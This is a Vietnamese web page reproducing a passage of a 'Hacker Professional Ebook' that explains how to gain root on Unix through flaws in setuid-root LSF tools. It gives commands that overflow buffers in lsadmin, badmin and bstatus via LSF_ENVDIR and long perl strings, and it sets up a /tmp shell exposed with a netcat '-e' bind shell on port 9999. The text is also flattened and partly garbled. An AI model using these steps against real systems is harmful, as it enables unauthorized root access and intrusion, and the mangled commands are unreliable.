TAILIEUCHUNG - Hacker Professional Ebook part 258

Tham khảo tài liệu 'hacker professional ebook part 258', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | Bây giờ bạn cần tiếp tục bắt buộc những ứng dụng LSF tới Tất nhiên là nó cần có suid root. Như vậy là ứng cử viên mà chúng ta cần. Tất cả những gì chúng ta cần là hỏi bqc về thông tin của hàng đợi không tồn tại. you@localhost bqc -i dupa_zbita bqc sẽ tìm ra ngoài mà không có hàng đợi như dupa_zbita . Sau đó nó sẽ được lưu giữ vào log. nó sẽ sử dụng file config của chính mình my home dir Vulnerability 3 Những sự bất thường bên trong lsadmin và badmin . Hacker có thể khai thác sự bất thường này để Get Root. lsadmin và badmin được thực thi khi có UID Root. Hơn nữa các Hacker còn có thể khai thác một số Bug Buffer Overflow Chúng được xuất hiện khi lsadmin hoặc badmin đang cố gắng xác định thư mục môi trường của nó bới biến LSF_ENVDIR kiểm tra. you@localhost setenv LSF_ENVDIR perl -e print A x 292 you@localhost lsadmin or badmin Segmentation fault Nó đã bị Buffer Overflow. Vulnerability 4 Bug này khá nguy có thể làm tràn bộ đệm hay Get Root. Trong trường hợp không sẵn sàng sử dụng eauth như một cơ chế chứng thực. Tất cả sự thực thi LSF được cài đặt với SUID Root. Vấn đề này sẽ có thể dẫn đến lỗi tràn bộ đệm you@localhost bstatus perl -e print A x 524 Bạn có thể đặt giá trị trên 524 nếu cần. 4 Get Root Để Get Root bạn phải lợi dụng sự sơ hở về Permission của hệ thống. Thường thì tmp được cấp phép khá lỏng lẻo. Đầu tiên bạn phải tạo một Shell đơn giản vào thư mục tmp you@localhost cat tmp rootshell bin bash bin bash -I Bây giờ ta lấy Netcat ra xài nào. Đặt Netcat ra Listen trên Port nào đó vào Shell mà ta mới tạo victim@localhost nc -vv -l -p 9999 -e tmp rootshell listening on any 9999 Bây giờ bạn tiếp tục Connect đến Port 9999 mà bạn đặt Listen ở trên you@localhost nc -nvv 9999 9999 open stty standard input Invalid argument root@localhost pwd pwd rootHy vọng qua bài viết này bạn đã phần nào hiểu được một số cách tấn công Unix. .Unix không phải là một OS bất khả xâm phạm. .phải

Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.